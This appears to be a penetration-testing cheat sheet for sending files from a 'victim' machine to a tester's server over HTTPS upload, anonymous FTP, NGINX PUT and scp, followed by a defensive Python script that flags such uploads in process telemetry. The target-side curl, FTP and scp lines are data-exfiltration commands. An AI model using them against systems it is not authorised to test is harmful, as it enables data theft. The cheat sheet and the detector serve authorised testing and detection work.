Some Commands Require SUDO Privileges
Note
- Some Operations May Be Blocked Due to Firewall Rules. Outbound Traffic is usually Disallowed using HTTP (TCP/80) and HTTPS (TCP/443) Protocols.
- The Default Ports that the Services Below use Might be Blocked Or Filtered by an IDS or Firewall.
Note
- Server: Basic Queries to set up a Running Server.
- Target: These Operations should be done on the Victim Machine.
- Interactive: We Log into a Remote Machine via RDP, SSH, etc.
- Non Interactive: Commands run in their own Subshell and this Shell is not Interactive. It Opens to Execute but closes Immediately.
Python Web Server
- Server HTTP/S
:: Requires [uploadserver] Package
:: HTTP Server
python3 -m uploadserver
:: HTTPS Server
:: Create a Self-Signed Certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
:: Start the Web Server
mkdir https && cd https
python3 -m uploadserver 443 --server-certificate /<OPENSSL [server.pem] Location>
- Target
:: Upload the File to the Upload Server
:: Default Folder [/upload]
:: [--insecure] Skips Certificate Verification (Needed for the Self-Signed Certificate)
curl -X POST https://<IP>/upload -F 'files=@/<File Name>' --insecure
FTP
- Server
:: Requires [pyftpdlib] Package
:: Start The Server
:: [--write] Grants Write Access so that Uploads are Accepted
python3 -m pyftpdlib --port 21 --write
- Interactive
:: Interactive SHELL
:: Access The Server
:: [USER: anonymous PASSWORD: anonymous]
:: [PUT] - Upload The File
ftp -p <IP> 21
- Non Interactive
# Non Interactive SHELL
# Target
echo '#!/bin/bash' > FTP.sh
echo 'HOST=<IP>' >> FTP.sh
echo 'PORT=<PORT>' >> FTP.sh
echo 'USER=anonymous' >> FTP.sh
echo 'PASSWORD=anonymous' >> FTP.sh
echo 'ftp -p -inv $HOST $PORT << EOF' >> FTP.sh
echo 'user $USER $PASSWORD' >> FTP.sh
echo 'put <File Name>' >> FTP.sh
echo 'bye' >> FTP.sh
echo 'EOF' >> FTP.sh
# Upload the File
chmod +x FTP.sh; ./FTP.sh
NGINX
Uses Port 80 By Default
- Preparations
:: Create Directory to Handle Uploaded Files
mkdir -p /var/www/uploads/CustomUploadDirectory
:: Change the Owner to [www-data]
chown -R www-data:www-data /var/www/uploads/CustomUploadDirectory
:: Create Nginx Configuration File [Lookup Configuration Tab]
/etc/nginx/sites-available/upload.conf
- Configuration
server {
    listen 9001;
    location /CustomUploadDirectory/ {
        root /var/www/uploads;
        dav_methods PUT;
        autoindex on;
        autoindex_format html;
        autoindex_localtime on;
    }
}
- Server
:: Symlink our Site to the Sites-Enabled Directory
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
:: Start [NGINX] Server
systemctl restart nginx.service
:: Show Errors (If any)
cat /var/log/nginx/error.log
- Target
:: Upload Files using [CURL]
curl -T <File Name> http://<IP>:<PORT>/CustomUploadDirectory/<Output>
SCP
:: Copy Local File to the Remote System
scp -P 22 "<File Name>" <Username>@<IP>:/<Output>
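For defenders, a host-side check over process command lines (for example from auditd or EDR telemetry) that flags the upload forms used on this page. It is an added example, not part of the original notes; the `classify` function, the sample command lines and the 203.0.113.10 address are constructed for illustration.

```python
import shlex

# Constructed sample command lines (as seen in auditd/EDR process telemetry).
SAMPLES = [
    "curl -X POST https://203.0.113.10/upload -F 'files=@/home/user/data.tar' --insecure",
    "curl -T report.zip http://203.0.113.10:9001/CustomUploadDirectory/report.zip",
    'scp -P 22 "db dump.sql" user@203.0.113.10:/tmp/out',
    "ftp -p -inv 203.0.113.10 21",
    "curl -s https://example.com/index.html -o index.html",
    "scp user@203.0.113.10:/etc/motd ./motd",
]
SCP_VALUE_OPTS = {"-P", "-i", "-o", "-F", "-c", "-l", "-S", "-J"}  # options that take a value

def classify(cmdline):
    """Return reasons why a command line looks like a local-file upload ([] if none)."""
    try:
        argv = shlex.split(cmdline)      # honours quoting, e.g. "db dump.sql"
    except ValueError:
        return ["unparseable quoting"]   # surface it rather than silently pass
    if not argv:
        return []
    tool, args, reasons = argv[0].rsplit("/", 1)[-1], argv[1:], []
    if tool == "curl":
        for flag, value in zip(args, args[1:] + [""]):
            if flag in ("-T", "--upload-file"):
                reasons.append("curl PUT upload of " + value)
            elif flag in ("-F", "--form") and "=@" in value:
                reasons.append("curl multipart upload of " + value.split("=@", 1)[1])
        if reasons and ("-k" in args or "--insecure" in args):
            reasons.append("TLS verification disabled")
    elif tool == "scp":
        operands, skip = [], False
        for a in args:
            if skip:
                skip = False
            elif a.startswith("-"):
                skip = a in SCP_VALUE_OPTS
            else:
                operands.append(a)
        # Upload = last operand is remote (host:path) and some source is local.
        if len(operands) >= 2 and ":" in operands[-1] and any(":" not in o for o in operands[:-1]):
            reasons.append("scp upload to " + operands[-1])
    elif tool == "ftp":
        flags = "".join(a[1:] for a in args if a.startswith("-"))
        if "i" in flags and "n" in flags:  # no prompts + no auto-login = scripted use
            reasons.append("ftp scripted session (-i -n)")
    return reasons

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or "ok", "<-", line)
```

The ftp rule only marks a scripted session; the `put` itself travels on stdin, so pair it with FTP control-channel or network logs to confirm an upload.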